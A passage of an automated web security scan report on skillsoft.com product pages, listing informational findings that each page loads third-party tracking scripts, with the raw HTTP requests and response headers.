Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49958
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.51. http://skillsoft.com/products/SkillChoice_Solutions.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/SkillChoice_Solutions.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/SkillChoice_Solutions.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50473
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.52. http://skillsoft.com/products/SkillPort/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/SkillPort/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/SkillPort/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53332
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.53. http://skillsoft.com/products/SkillSoft_Select.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/SkillSoft_Select.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/SkillSoft_Select.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50611
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.54. http://skillsoft.com/products/course_collections/IT_professional.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/IT_professional.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/course_collections/IT_professional.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50976
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.55. http://skillsoft.com/products/course_collections/Sun.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/Sun.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/course_collections/Sun.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47319
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.56. http://skillsoft.com/products/course_collections/business_skills.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/business_skills.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/course_collections/business_skills.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.57. http://skillsoft.com/products/course_collections/compliance.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/compliance.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/course_collections/compliance.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49665
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.58. http://skillsoft.com/products/course_collections/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/course_collections/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51630
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.59. http://skillsoft.com/products/course_collections/desktop_skills.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/desktop_skills.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/course_collections/desktop_skills.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49436
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.60. http://skillsoft.com/products/course_collections/esh.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/esh.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/course_collections/esh.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49408
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.61. http://skillsoft.com/products/course_collections/legal.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/legal.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/course_collections/legal.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62370
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.62. http://skillsoft.com/products/course_collections/skillsims.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/skillsims.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/course_collections/skillsims.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47849
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.63. http://skillsoft.com/products/custom_content/SkillStudio.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/custom_content/SkillStudio.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/custom_content/SkillStudio.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47243
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.64. http://skillsoft.com/products/custom_content/custom_solutions.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/custom_content/custom_solutions.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/custom_content/custom_solutions.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47173
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.65. http://skillsoft.com/products/custom_content/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/custom_content/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/custom_content/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45297
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.66. http://skillsoft.com/products/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48713
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.67. http://skillsoft.com/products/inGenius/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/inGenius/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/inGenius/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
